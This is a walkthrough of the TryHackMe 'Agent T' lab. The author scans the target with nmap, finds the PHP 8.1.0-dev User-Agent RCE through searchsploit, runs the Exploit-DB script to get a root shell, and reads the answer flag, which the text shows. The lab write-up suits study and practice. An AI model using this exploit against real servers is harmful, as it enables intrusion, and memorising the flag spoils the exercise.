Tryhackme - Agent T

Tryhackme – Agent T

In this walk through, we will be going through the Agent T room from Tryhackme. This room is rated as Easy on the platform and consist exploitation of a PHP server using a known exploit to get the required flag. So, let’s get started without any delay.

Agent T

Machine Info:

TitleAgent T VM
IPaddress10.10.55.180
DifficultyEasy
ObjectiveAgent T uncovered this website, which looks innocent enough, but something seems off about how the server responds…

Enumeration:

  • I first started with a all ports scan using the timing template of 4 and found only port 80 opened. Then i issued another scan to detect service version of the running webserver and found out that it is using PHP server with a PHP version 8.1.0-dev. Pretty interesting.

sudo nmap -sS -p- -T4 10.10.55.180

nmap scan

nmap -sV -p 80 10.10.55.180

nmap service scan

  • Found nothing worth in the application running on port 80. It is more of a rabbit hole and i too fell in it and wasted a lot of time.

Admin Dashboard

  • Next, i searched for any known exploits and got a User Agent RCE exploit. Bingo!

searchsploit PHP 8.1.0

PHP 8.1.0 exploits

PHP 8.1.0-dev - User Agent RCE

Initial Access:

  • Used the exploit from Exploit DB and fired it on our target which gives me a root shell. Nothing better than that.

copy the exploit from searchsploit

wh1terose@fsociety:~/CTF/TryHackme/AgentT$ python3 49933.py 
Enter the full host url:
http://10.10.55.180

Interactive shell is opened on http://10.10.55.180 
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)

getting root

Getting the Flag:

  • The shell we have here has some restrictions as it did not let me to move freely around the filesystem and constrained me within the current directory. I overcome this limitation by exploiting directory traversal in the shell and read the contents of the flag file.

$ ls ../../../../../../../
bin
boot
dev
etc
flag.txt
home

-- snipped --

$ cat ../../../../../../../flag.txt
flag{4127d0530abf16d6d23973e3df8dbecb}
$ 

flag.txt

Task 1 – Find The Flag

Question 1 – What is the flag?

Task 1 - Find The Flag

Also Read: Tryhackme – Windows PrivEsc Arena

Conclusion:

Conclusion

So that was “Agent T” for you. We first started with a nmap scan and found port 80 opened with a PHP web server running specifically PHP version 8.1.0-dev. Enumerated the website running on port 80 and found nothing useful. So, searched for the known exploits for the PHP server version using searchsploit and got a hit for a User Agent RCE exploit. Used it to get root access on the system and captured the flag. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top